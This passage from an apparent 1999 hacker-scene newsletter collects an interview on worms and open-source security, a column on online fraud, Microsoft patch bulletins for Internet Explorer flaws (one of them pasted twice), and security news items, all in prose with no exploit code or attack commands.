what they where building and they said a black box. One of them was Intrepid Traveler. Intrepid gave me the number to a local board. The rather famous Lunatic Labs. It was that encounter and going to the LA 2600 meetings that really got me started in this whole business. After calling LunaLabs for the first time I obtained a list of several other boards. For that whole first month I called some other of the better known non-local boards in the country. Daemon Roach Underground, UPT, and some others. After my phone bill that month reached several hundred dollars I decided to stop calling long distance boards. I hanged out at LunaLabs and some other local boards but then moved on. I had Net access! What platform/s do you prefer to work with? Why? Linux and Windows NT. Linux for the simple fact that it supports more of the hardware I want to use and more applications. Windows NT I use mostly for applications. Truth is I hate OS wars. They are the dumbest thing in the world. Each OS has its strengths and weaknesses. Use the right tool for the right job, or use the tool you feel the more comfortable with. There seem to be two camps in the security industry right now. There's one camp that thinks they are secure or close and the other that is just waiting for the killer app and understands the damage it could cause. That melissa virus really freaked people out, but if you know anything about security you know melissa was nothing compared what could be coming. Do you think the second camp is right, or alarmists? If there is any camp that thinks they are secure then I must have missed them. But I don't think we are doomed either. For the longest time I wondered why no one had written a new worm. After all its not really that difficult. But the reality is that even with Microsoft dominance of the OS market we live in a very heterogeneous world. Writing a worm that can infect more than one OS is more work. Writing a worm that can infect all OS and different version of the same OS is a very large task. Even the DNS ADM worm floating around didn't do much. To many flavors to take care of them all. Even by all accounts the Internet Worm didn't really spread to a majority of the Net back then. The thing could only really infect to flavors of UNIX. Yet even if we are not looking at a doomsday scenario a good number of people could be inconvenience by a large enough attack. Melissa did not infect anywhere near a majority of net user. Still it was a large number. Should that guy who wrote it be held responsible, or microsoft for writing insecure software, or the end user who runs it because they are ignorant? I don't believe the guy who wrote it should be held any more responsible than than someone who publishes bomb recipes (or cookie recipes for that matter). The person that released the virus to the wild should be held accountable although the fact that it wasn't malicious should be taken into account. Microsoft should be held accountable as well. They will of course reply that they simply add features because customers ask for it. Yet when you reach the monopoly Microsoft has reached you have the obligation to do what is best to the consumer, even if it means telling them they can't have some features. Finally, the consumer should be held responsible as well. They continue to base their purchasing decisions solely on an applications feature set without taking into account security implications. Do you feel the quality of virii and hacks are going to increase as we approach y2k and move past it? The number of knowledgable people will increase so the number of quality virii/hacks will increase as well. But the addition of the "hacker" figure to the pop culture pantheon of rebels will also increase the number of clueless people that call themselves hackers, therefore the percentage of quality virii/hacks will decrease. Do you think we are going to see an increase in foreign governments using the internet to harm their enemies? We will see an increase of intelligence gathering activities by government entities but I doubt it would develop into "net war". After all their computers are just as vulnerable as ours. I guess we go back to the doctrine of mutually assured destruction. Of course this assumes their society is as dependent on the net as ours is. Although I feel like I have more access to information now (news reports from alternate sources, video of human rights violations, etc.) I still feel like I'm missing the same piece of the puzzle, if you know what I mean. Take China for instance. Their current government has created an Orwellian 1984 -- and proved that history repeats. They have created the Great Firewall of China and are executing people for acts conducted over the net. Singapore is proxied -- the whole country. I can't even imagine what that would be like. Do you think the oppression can continue, or... I think the Net is a wonderful tool to bring down such regimes. Before it the TV had a similar impact. It had the effect of introducing foreign ideas that are difficult to control into those environments. I think the problem you are seeing is that you are excepting change to occur overnight. That is very unlikely. I takes at least a whole generation for the young people that embrace these ideas to come into power. You also have to understand that those societies are not as wired as ours. The people with net access in those areas tend to be either the elite, the ones in power or the rich. Not exactly those that you want to reach. I see things moving in the right direction but it will take time. Do you have any info on the cDc's Chinese emailer app? I guess it returns censored web sites via email. No. Although it sounds like a wonderful tool. Do you believe Open Source is the only way to be secure? Theoretically yes. In practice it can actually be a hindrance. The common example is comparing the number of Linux exploits to say Solaris. The are many more Linux exploits among other things because people can read the source. Now in theory since we have the source everyone should have audited it and fixed any problems, but how many people actually do that? In theory you can also find vulnerabilities in a closed source system, but in practice its more difficult. So security through obscurity can help, its just that you should never depend on it. Does this mean we should give up on open source? No. It just means we have to strive at doing better auditing of it ala OpenBSD or the Linux Auditing Project. Marcus Ranum has some very good ideas on how open source can actually burn you. That was an interesting discussion about this issue on the firewall mailing list with regards of the availability of the Gauntlet firewall source code. The source code has been available to any customer for years (until recently), but how many people actually bothered to look at it and send in bug reports? Not many. Everyone want to live in an utopia. To bad we live in a practical world. Know anything about Quantum Cryptography? I found some source code for a simulation... Just some basic concepts. Nothing I would want do describe for fear of talking about something I don't really know about ;) What's up with your web site underground.org? It's a pretty picture but everyone wants to know if there is some skunk works going on back there... There is nothing there but the picture. Underground was a fairly popular security archive in the past. Over time it grew to the point it became difficult to maintain and I let it rot. At some point in the future a hard drive crash took the web server down. All the information in the site was so dated that I decided to keep it down. I have been working on a new version of the site for a very long time now. I can't say when it will be ready. It's a lot of work and not very fun at that. Who is Jennifer Myers? The person that runs that defacto BugTraq archives at geek-girl.com. She's had no formal relationship with BugTraq. The Bugtraq. @HWA 28.0 World Wide Wangle cmp net techweb article (FUD) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ May 01, 1999, Issue: 1005 Section: Analysis World Wide Wangle Mike Elgan Online auction scams, pirate software and e-mail cons are ripping off legions of innocent Web surfers. Hucksters have always done just as well online as they do offline, but lately, Internet fraud has spiraled totally out of control. Investor watchdog groups estimate that Internet stock fraud now costs would-be investors more than $1 million an hour. And it's not just the newbie consumers being suckered-some of the biggest victims are large companies and sophisticated users who are quite comfortable buying online. Of course, many online auction, investment and shopping sites are legitimate and recommended. But as the good sites make us more comfortable online, the bad ones take advantage of that comfort level to rip us off. The knee-jerk government approach is to talk tough and write new laws that would lock up the crooks. For example, the state of Virginia recently passed a law that makes spam illegal. About half the states already have or are considering similar laws. But Virginia matters because it's the home of America Online-the spam capital of the Internet-and also of mega-ISPs UUnet and PSINet. Though Virginia's law covers all spam, it specifically targets fraud and dirty e-mail tricks, such as the illegal use of domain names. Sure, Virginia will catch some crooks and nab a few headlines. But that won't stop or even slow the rampant growth of spam and e-mail fraud-for the denizens of Virginia or anyone else. Why? The Internet is fundamentally ungovernable. How do you catch a crook you can't find? The easiest-to-catch Net criminals are minors. British authorities recently announced that the mastermind behind a major software bootlegging operation plaguing the nation was an 11-year-old boy working from his bedroom in Sunderland. Older and more sophisticated scam artists increasingly use hacker tricks to cover their tracks, or move offshore, or both. International organized crime groups, from Hong Kong Triads to the Russian Mafia, have suddenly discovered Internet fraud. How will the state of Virginia-or even the federal government-arrest Internet thieves operating anonymously from Costa Rica or North Korea? Worse, laws intended to catch crooks will reduce the value of the Net. The only way to enforce these laws is more government snooping, fewer individual freedoms and products that keep tabs on your Web whereabouts. The best way to stop Internet crime is education. Internet users must learn to be both savvy and cynical to safely surf the Web. State agencies and the federal government should be boosting computer and Internet education for schoolchildren, parents and businesses, instead of relying on tough talk and toothless laws. The bottom line is that we all need to start using common sense online. Some good rules are already apparent: Don't give your credit card information to a company you've never heard of. Use software to blast spam before you even open it. Be suspicious of fads like online auctions, pyramid schemes and "Billy needs a new spleen" e-mail. This all sounds suspiciously like the same kind of common sense you'd apply offline, but it's a little harder to do on the instant-gratification Internet. Have you been ripped off online yet? If so, I'd like to hear your story: mike@elgan.com. Copyright ® 1999 CMP Media Inc. @HWA 29.0 Microsoft DHTML patch advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Microsoft Security Bulletin (MS99-011) -------------------------------------- Patch Available for "DHTML Edit" Vulnerability Originally Posted: April 21, 1999 Summary ======= Microsoft has released a patch that eliminates a vulnerability in an ActiveX control that is distributed in Internet Explorer 5 and downloadable for Internet Explorer 4.0. The vulnerability could allow a malicious web site operator to read information that a user had loaded into the control, and it also could allow files with known names to be copied from the user's local hard drive. A fully supported patch is available to eliminate this vulnerability and Microsoft recommends that affected customers download and install it, if appropriate. Issue ===== The DHTML Edit control is an ActiveX control that is distributed with Internet Explorer 5 and can be downloaded for use in Internet Explorer 4.0. The control enables users to edit HTML text and see a faithful rendition of how the text would look in the browser. There are two versions of the control: a more powerful version that cannot be invoked by a web site because it includes file access and other features, and a "safe for scripting" version that has restricted functionality and is intended for use by web sites. The root cause of the vulnerability lies in the fact that a web site that hosts the "safe for scripting" version of the control is able to upload any data entered into the control. A malicious web site operator could trick a user into entering sensitive data into a DHTML Edit control hosted on a web page from the operator's site, and then upload the data. In addition, if the malicious web site operator knows the name of a file on the user's local drive, it is possible for the operator to programmatically load the file into the control and then upload it. The patch works by allowing a web site to load data from the control only if it is in the site's domain. While there are no reports of customers being adversely affected by this vulnerability, Microsoft is proactively releasing this patch to allow customers to take appropriate action to protect themselves against it. Affected Software Versions ========================== - Microsoft Internet Explorer 5 on Windows 95, Windows 98, and Windows NT 4.0. Internet Explorer 5 on other platforms is not affected. - Microsoft Internet Explorer 4.0 on Windows 95, Windows 98 and the x86 version of Windows NT 4.0. Internet Explorer 4.0 on other platforms, including the Alpha version of Windows NT 4.0, is not affected. Note: The DHTML Edit control is included by default in Internet Explorer 5. It is not included by default in Internet Explorer 4.0, but can be downloaded and installed. Internet Explorer 4.0 customers who are unsure whether they have installed the control should see What Customers Should Do. What Microsoft is Doing ======================= Microsoft has released patches that fix the problem identified. The patches are available for download from the sites listed below in What Customers Should Do. Microsoft also has sent this security bulletin to customers subscribing to the Microsoft Product Security Notification Service. See http://www.microsoft.com/security/services/bulletin.asp for more information about this free customer service. Microsoft has published the following Knowledge Base (KB) article on this issue: - Microsoft Knowledge Base (KB) article Q226326, Update Available for 'DHTML Edit' Security Issue, http://support.microsoft.com/support/kb/articles/q226/3/26.asp. (Note: It might take 24 hours from the original posting of this bulletin for the KB article to be visible in the Web-based Knowledge Base.) What Customers Should Do ======================== Microsoft highly recommends that customers determine whether they are potentially affected by the vulnerability: - All copies of Internet Explorer 5 contain the DHTML Edit control, so all Internet Explorer 5 customers are potentially affected by the vulnerability. - The only Internet Explorer 4.0 users who are potentially affected by the vulnerability are those who have downloaded and installed the DHTML Edit control. If this has been done, the file dhtmled.ocx will be present on the hard drive. By default, this file will be stored in the folder C:\Program Files\Common Files\Microsoft Shared\Triedit\. Customers who are potentially affected by the vulnerability should evaluate the degree of risk that this vulnerability poses to their systems and determine whether to download and install the patch. The patch can be found at http://www.microsoft.com/windows/ie/security/dhtml_edit.asp. More Information ================ Please see the following references for more information related to this issue. - Microsoft Security Bulletin MS99-011, Patch Available for DHTML Edit Vulnerability. (The Web-posted version of this bulletin), http://www.microsoft.com/security/bulletins/ms99-011.asp. - Microsoft Knowledge Base (KB) article Q226326, Update Available for 'DHTML Edit' Security Issue, http://support.microsoft.com/support/kb/articles/q226/3/26.asp. (Note: It might take 24 hours from the original posting of this bulletin for the KB article to be visible in the Web-based Knowledge Base.) Obtaining Support on this Issue =============================== If you require technical assistance with this issue, please contact Microsoft Technical Support. For information on contacting Microsoft Technical Support, please see http://support.microsoft.com/support/contact/default.asp. Acknowledgments =============== Microsoft acknowledges Juan Carlos Cuartango of Spain for discovering this vulnerability and reporting it to us. Revisions ========= - April 21, 1999: Bulletin Created. For additional security-related information about Microsoft products, please visit http://www.microsoft.com/security -------------------------------------------------------------------- THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY. (c) 1999 Microsoft Corporation. All rights reserved. ******************************************************************* You have received this e-mail bulletin as a result of your registration to the Microsoft Product Security Notification Service. You may unsubscribe from this e-mail notification service at any time by sending an e-mail to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM The subject line and message body are not used in processing the request, and can be anything you like. For more information on the Microsoft Security Notification Service please visit http://www.microsoft.com/security/bulletin.htm. For security-related information about Microsoft products, please visit the Microsoft Security Advisor web site at http://www.microsoft.com/security.Microsoft Security Bulletin (MS99-011) -------------------------------------- Patch Available for "DHTML Edit" Vulnerability Originally Posted: April 21, 1999 Summary ======= Microsoft has released a patch that eliminates a vulnerability in an ActiveX control that is distributed in Internet Explorer 5 and downloadable for Internet Explorer 4.0. The vulnerability could allow a malicious web site operator to read information that a user had loaded into the control, and it also could allow files with known names to be copied from the user's local hard drive. A fully supported patch is available to eliminate this vulnerability and Microsoft recommends that affected customers download and install it, if appropriate. Issue ===== The DHTML Edit control is an ActiveX control that is distributed with Internet Explorer 5 and can be downloaded for use in Internet Explorer 4.0. The control enables users to edit HTML text and see a faithful rendition of how the text would look in the browser. There are two versions of the control: a more powerful version that cannot be invoked by a web site because it includes file access and other features, and a "safe for scripting" version that has restricted functionality and is intended for use by web sites. The root cause of the vulnerability lies in the fact that a web site that hosts the "safe for scripting" version of the control is able to upload any data entered into the control. A malicious web site operator could trick a user into entering sensitive data into a DHTML Edit control hosted on a web page from the operator's site, and then upload the data. In addition, if the malicious web site operator knows the name of a file on the user's local drive, it is possible for the operator to programmatically load the file into the control and then upload it. The patch works by allowing a web site to load data from the control only if it is in the site's domain. While there are no reports of customers being adversely affected by this vulnerability, Microsoft is proactively releasing this patch to allow customers to take appropriate action to protect themselves against it. Affected Software Versions ========================== - Microsoft Internet Explorer 5 on Windows 95, Windows 98, and Windows NT 4.0. Internet Explorer 5 on other platforms is not affected. - Microsoft Internet Explorer 4.0 on Windows 95, Windows 98 and the x86 version of Windows NT 4.0. Internet Explorer 4.0 on other platforms, including the Alpha version of Windows NT 4.0, is not affected. Note: The DHTML Edit control is included by default in Internet Explorer 5. It is not included by default in Internet Explorer 4.0, but can be downloaded and installed. Internet Explorer 4.0 customers who are unsure whether they have installed the control should see What Customers Should Do. What Microsoft is Doing ======================= Microsoft has released patches that fix the problem identified. The patches are available for download from the sites listed below in What Customers Should Do. Microsoft also has sent this security bulletin to customers subscribing to the Microsoft Product Security Notification Service. See http://www.microsoft.com/security/services/bulletin.asp for more information about this free customer service. Microsoft has published the following Knowledge Base (KB) article on this issue: - Microsoft Knowledge Base (KB) article Q226326, Update Available for 'DHTML Edit' Security Issue, http://support.microsoft.com/support/kb/articles/q226/3/26.asp. (Note: It might take 24 hours from the original posting of this bulletin for the KB article to be visible in the Web-based Knowledge Base.) What Customers Should Do ======================== Microsoft highly recommends that customers determine whether they are potentially affected by the vulnerability: - All copies of Internet Explorer 5 contain the DHTML Edit control, so all Internet Explorer 5 customers are potentially affected by the vulnerability. - The only Internet Explorer 4.0 users who are potentially affected by the vulnerability are those who have downloaded and installed the DHTML Edit control. If this has been done, the file dhtmled.ocx will be present on the hard drive. By default, this file will be stored in the folder C:\Program Files\Common Files\Microsoft Shared\Triedit\. Customers who are potentially affected by the vulnerability should evaluate the degree of risk that this vulnerability poses to their systems and determine whether to download and install the patch. The patch can be found at http://www.microsoft.com/windows/ie/security/dhtml_edit.asp. More Information ================ Please see the following references for more information related to this issue. - Microsoft Security Bulletin MS99-011, Patch Available for DHTML Edit Vulnerability. (The Web-posted version of this bulletin), http://www.microsoft.com/security/bulletins/ms99-011.asp. - Microsoft Knowledge Base (KB) article Q226326, Update Available for 'DHTML Edit' Security Issue, http://support.microsoft.com/support/kb/articles/q226/3/26.asp. (Note: It might take 24 hours from the original posting of this bulletin for the KB article to be visible in the Web-based Knowledge Base.) Obtaining Support on this Issue =============================== If you require technical assistance with this issue, please contact Microsoft Technical Support. For information on contacting Microsoft Technical Support, please see http://support.microsoft.com/support/contact/default.asp. Acknowledgments =============== Microsoft acknowledges Juan Carlos Cuartango of Spain for discovering this vulnerability and reporting it to us. Revisions ========= - April 21, 1999: Bulletin Created. For additional security-related information about Microsoft products, please visit http://www.microsoft.com/security -------------------------------------------------------------------- THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY. (c) 1999 Microsoft Corporation. All rights reserved. ******************************************************************* You have received this e-mail bulletin as a result of your registration to the Microsoft Product Security Notification Service. You may unsubscribe from this e-mail notification service at any time by sending an e-mail to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM The subject line and message body are not used in processing the request, and can be anything you like. For more information on the Microsoft Security Notification Service please visit http://www.microsoft.com/security/bulletin.htm. For security-related information about Microsoft products, please visit the Microsoft Security Advisor web site at http://www.microsoft.com/security. @HWA 30.0 Microsoft MSIE4 and 5 vulnerabilities patch advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Microsoft Security Bulletin (MS99-012) -------------------------------------- MSHTML Update Available for Internet Explorer Originally Posted: April 21, 1999 Summary ======= Microsoft has released an updated version of a component of Internet Explorer 4.0 and 5. The updated version eliminates three security vulnerabilities described below. It is fully supported and Microsoft recommends that affected customers download and install it, if appropriate. Issue ===== MSHTML.DLL is the parsing engine for HTML in Internet Explorer. The vulnerabilities that are eliminated by the update are not related to each other except for the fact that all reside within the parsing engine. - The first vulnerability is a privacy issue involving the processing of the "IMG SRC" tag in HTML files. This tag identifies and loads image sources - image files that are to be displayed as part of a web page. The vulnerability results because the tag can be used to point to files of any type, rather than only image files, after which point the document object model methods can be used to determine information about them. A malicious web site operator could use this vulnerability to determine the size and other information about files on the computer of a visiting user. It would not allow files to be read or changed, and the malicious web site operator would need to know the name of each file. - The second vulnerability is a new variant of a previously-identified cross-frame security vulnerability. A particular malformed URL could be used to execute scripts in the security context of a different domain. This could allow a malicious web site operator to execute a script on the web site, and gain privileges on visiting users' machines that are normally granted only to their trusted sites. - The third vulnerability affects only Internet Explorer 5.0, and is a new variant of a previously-identified untrusted scripted paste vulnerability. The vulnerability would allow a malicious web site operator to create a particular type of web page control and paste into it the contents of a visiting user's clipboard. While there are no reports of customers being adversely affected by any of these vulnerabilities, Microsoft is proactively releasing an updated version of MSHTML.DLL to allow customers to take appropriate action to protect themselves against it. Affected Software Versions ========================== - Internet Explorer 4.0 and 5 on Windows 95, Windows 98 and Windows NT 4.0. What Microsoft is Doing ======================= Microsoft has released patches that fix the problem identified. The patches are available for download from the sites listed below in What Customers Should Do. Microsoft also has sent this security bulletin to customers subscribing to the Microsoft Product Security Notification Service. See http://www.microsoft.com/security/services/bulletin.asp for more information about this free customer service. Microsoft has published the following Knowledge Base (KB) article on this issue: - Microsoft Knowledge Base (KB) article Q226326, Update Available for MSHTML Security Issues in Internet Explorer, http://support.microsoft.com/support/kb/articles/q226/3/26.asp. (Note: It might take 24 hours from the original posting of this bulletin for the KB article to be visible in the Web-based Knowledge Base.) What Customers Should Do ======================== Microsoft highly recommends that customers evaluate the degree of risk that this vulnerability poses to their systems and determine whether to download and install the patch. The patch can be found at http://www.microsoft.com/windows/ie/security/mshtml.asp. More Information ================ Please see the following references for more information related to this issue. - Microsoft Security Bulletin MS99-012, MSHTML Update Available for Internet Explorer (The Web-posted version of this bulletin), http://www.microsoft.com/security/bulletins/ms99-012.asp. - Microsoft Knowledge Base (KB) article Q226326, Update Available for MSHTML Security Issues in Internet Explorer, http://support.microsoft.com/support/kb/articles/q226/3/26.asp. - Microsoft Security Bulletin MS98-013, Fix available for Internet Explorer Cross Frame Navigate Vulnerability, http://www.microsoft.com/security/bulletins/ms98-013.asp - Microsoft Security Bulletin MS98-015, Update available for "Untrusted Scripted Paste" Issue in Microsoft Internet Explorer 4.01, http://www.microsoft.com/security/bulletins/ms98-015.asp Obtaining Support on this Issue =============================== If you require technical assistance with this issue, please contact Microsoft Technical Support. For information on contacting Microsoft Technical Support, please see http://support.microsoft.com/support/contact/default.asp. Acknowledgments =============== Microsoft acknowledges Richard M. Smith, President, Phar Lap Software, Inc., for discovering the IMG SRC vulnerability, and Georgi Guninski from TechnoLogica Ltd., Bulgaria, for discovering the cross-frame and untrusted scripted paste vulnerabilities. Revisions ========= - April 21, 1999: Bulletin Created. For additional security-related information about Microsoft products, please visit http://www.microsoft.com/security ---------------------------------------------------------------------- THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY. (c) 1999 Microsoft Corporation. All rights reserved. ******************************************************************* You have received this e-mail bulletin as a result of your registration to the Microsoft Product Security Notification Service. You may unsubscribe from this e-mail notification service at any time by sending an e-mail to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM The subject line and message body are not used in processing the request, and can be anything you like. For more information on the Microsoft Security Notification Service please visit http://www.microsoft.com/security/bulletin.htm. For security-related information about Microsoft products, please visit the Microsoft Security Advisor web site at http://www.microsoft.com/security. @HWA 31.0 [ISN] DoD considers pulling the plug on the net ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: Erik Parker http://www.fcw.com:80/pubs/fcw/1999/0419/fcw-newsdod-4-19-99.html Hammered by relentless hacker attacks against its unclassified network for years, the Defense Department may back away from using the Internet, which it invented, in favor of relying on intranet enclaves, according to a top Army official. Lt. Gen. William Campbell, Army director of information systems for command, control and communications, who last year ordered all Army World Wide Web sites shut down pending a security review of their contents, said last week that all military networks connected to the Internet are "inherently vulnerable.... We don't have a prayer or a hope of defending ourselves unless we move large portions of the '.mil' [domain] onto a protected network" such as an intranet not connected to the Internet. Campbell, speaking at a conference sponsored by the Association of the United States Army and the Association of Old Crows, suggested that DOD move its electronic commerce networks and publicly accessible Web sites to the ".com" domain, which is used by businesses. The vulnerability of DOD networks has captured the attention of senior members of all four armed services as well as DOD, Campbell said. "We would be remiss if we left these network connections out there," he said. "We need sufficient protection so no one can get into our networks and damage the defense of the United States." To handle its most sensitive traffic, DOD uses its Secret Internet Protocol Router Network, an intranet-like global network. Much of DOD's day-to-day business -- including logistics, personnel and pay -- is conducted on the Non-Classified Internet Protocol Router Network, which is connected to the Internet and looms as a DOD electronic Achilles' heel, Campbell said. "The openness of these networks makes us vulnerable to attacks by a hostile agent," Campbell said. "Vulnerabilities are of such a magnitude that to ignore them would be a dereliction of duty." Detected hacker attacks against DOD worldwide unclassified networks occur at a rate of 250,000 a year -- plus an untold number of undetected attacks, according to Air Force Maj. Gen. John "Soup" Campbell, director of the recently formed Joint Task Force for Computer Network Defense. Speaking at the AUSA/Old Crows conference, the Air Force's Campbell said these attacks threaten DOD's "basic logistics systems which run on the Internet." Philip Loranger, a civilian Army official who works for the Army's Campbell as chief of the service's Command and Control Protect Division, said the number of publicly accessible Web sites the Army operates poses a security risk. "We still have more public Web pages than necessary," he said. Loranger said the Army continues to shut down Web sites for security reasons. He recently closed to the public the Army's information assurance Web site. "In our zealousness to share information [with the American public], we are disclosing targeting information" that a terrorist or enemy state could use, Loranger said. John Hamre, deputy secretary of Defense, sounded a cautionary note about security vulnerabilities posed by the information posted on DOD Web sites and the ability of hackers to exploit the connections. But he warned that "we are far too connected to unplug ourselves [from the Web]." Hamre added that the Pentagon made a mistake in turning control of its Web activities over to its public relations department without considering security risks. The Pentagon has made strides in the past two years in terms of securing its critical information infrastructure, Hamre said. "The foundation is in place, but it is a dramatically more complicated problem." Hamre believes that vendors' e-commerce practices present a scenario ripe for exploitation. "The best way to attack the U.S. is to become someone's customer," he said. "They'll give you the software" to enter sensitive systems, with few checks and balances imposed on the distribution or use of that software. Tactical battlefield networks under development by the Army and Marines to support operations on future digitized battlefields have vulnerabilities, according to Maj. Gen. Robert Nabors, commander of the Army's Communications-Electronics Command. Army tactical battlefield networks, Nabors said, "do not have the bandwidth to handle commercial [information assurance] tools." -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Hacker News Network [www.hackernews.com] @HWA 32.0 Digital Dicks ~~~~~~~~~~~~~ From: William Knowles http://www.wired.com/news/news/technology/story/19191.html Detectives in the Digital Age 3:00 a.m. 19.Apr.99.PDT A computer virus writer with the stolen America Online user name "Sky Roket" turns up on a computer bulletin board in Norway and is arrested in New Jersey. A North Carolina computer engineer using an anonymous Web site service is linked to a stock hoax in California. Cybersleuths are catching perpetrators of hoaxes and malicious acts on the Internet more quickly, helped by growing cooperation between the online industry and law enforcement agents. "We're getting past the age of denial," said Richard Powers of Computer Security Institute in San Francisco. "People are realizing there's a problem and that we have to work on it together." But even after a string of high-profile takedowns of alleged Web criminals, the security experts championed as the Sam Spades of the digital age are warning about the future. Computer crime is growing, and smart criminals are avoiding prosecution, they say. Computer Security Institute surveys show that over the past year, "online intrusions" doubled as a percentage of computer crime. The reason it's happening, say the computer experts, is "that's where the money is." "Now that e-commerce is coming online and getting bigger and bigger, the fraud and criminal activity that used to be committed with fax and phone is moving onto the Internet," said George Vinson, a former FBI cybercrime unit member who is now with Deloitte & Touche's computer security practice. The experts say their search for perpetrators has gotten a boost from some less-than-clever methods used by hackers and hoaxters. For example, David Smith, the 30-year-old New Jersey man charged with creating Melissa "actually signed his name to some of the online documents he created," noted Richard Smith, the Cambridge, Massachusetts-based cybersleuth who was credited with the key breaks in cracking the Melissa case. The Melissa virus disrupted and crashed some e-mail and computer networks at thousands of companies and government agencies by overloading their systems. Smith, who was charged last week with violating an array of New Jersey computer laws, faces up to US$480,000 in fines if convicted. Cyberleuth Smith, who works for software company Phar Lap, found clues when he tracked the online postings linked to the suspect. "David Smith was a very good macro virus writer, but not a terribly good hacker," said security expert Michael Zboray of Gartner Group. "He could have done a much better job of covering his path. The next time this happens it might not be so easy." Perpetrators of cybercrimes have felt safe in the anonymity of cyberspace. But Internet service providers are growing more eager to hand over user logs in criminal investigations. And investigators are becoming better at searching the scenes of virtual crimes for clues to a perpetrator's identity. [snip...] -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Hacker News Network [www.hackernews.com] @HWA 33.0 Spooktech99 ~~~~~~~~~~~ Forwarded From: "Noonan, Michael D" >From Spyking's newsletter... SpookTech 99 - The Digital Detective Workshop It's that time again... The 3rd Annual SpookTech Conference... This years theme is "The Digital Detective"... Digital Evidence Acquisition tools & techniques will be demonstrated in this "hands-on" computer investigations training seminar... What we'll cover: Types of Computer Crime Cyber Law Basics How to Bypass Passwords How to Crack Encrypted Files How to Trace the Source of E-Mail How to Track a Suspect Online How to Track Online Activity How to Track Software Piracy How to Match a Diskette to a PC How to Recover Deleted Data Data Hiding Techniques Text Search Techniques Finding Disguised and Hidden Images How to Find Unique Identifiers in Documents How to Remotely Monitor a Target PC How to Find Clandestine Web Sites Social Engineering in Chat Rooms Types of Investigative Software Actual "Hands-On" Demonstrations of the latest High-Tech Evidence Gathering Software If you are in the business, you'll be amazed at some of the products we'll showcase... If you're interested in speaking or exhibiting your products let me know... Much more to be added... Don't Miss SpookTech 99 - The Digital Detective Workshop! June 1999 New York Each Participant will receive a CD-ROM with a demonstration copy of all software and PowerPoint presentations used during the seminar. Each Participant will receive a Certificate of Attendance Checkout: -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Hacker News Network [www.hackernews.com] @HWA 34.0 [ISN] review:"Ethical and Social Issues in the Information Age", Joseph Migga Kizza, ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 0387982752.RVW 990308 "Ethical and Social Issues in the Information Age", Joseph Migga Kizza, 0-387-98275-2, U$42.95 %A Joseph Migga Kizza %C Springer-Verlag New york, Inc., 175 Fifth Avenue, New York, NY 10010 %D 1998 %E D. Gries, F.B. Schneider %G 0-387-98275-2 %I Springer %O U$49.99 %P 172 p. %T "Ethical and Social Issues in the Information Age: Undergraduate Texts in Computer Science" Overview: "Ethical and Social Issues in the Information Age" is an excellent foundation and resource for defining ethics and morals in a technological world. For any reader interested in exploring this often shady area of life, I highly recommend this be your introduction. Along with the clear and concise defintions, each chapter references real world examples to help illustrate each point and make the reader aware of the real and 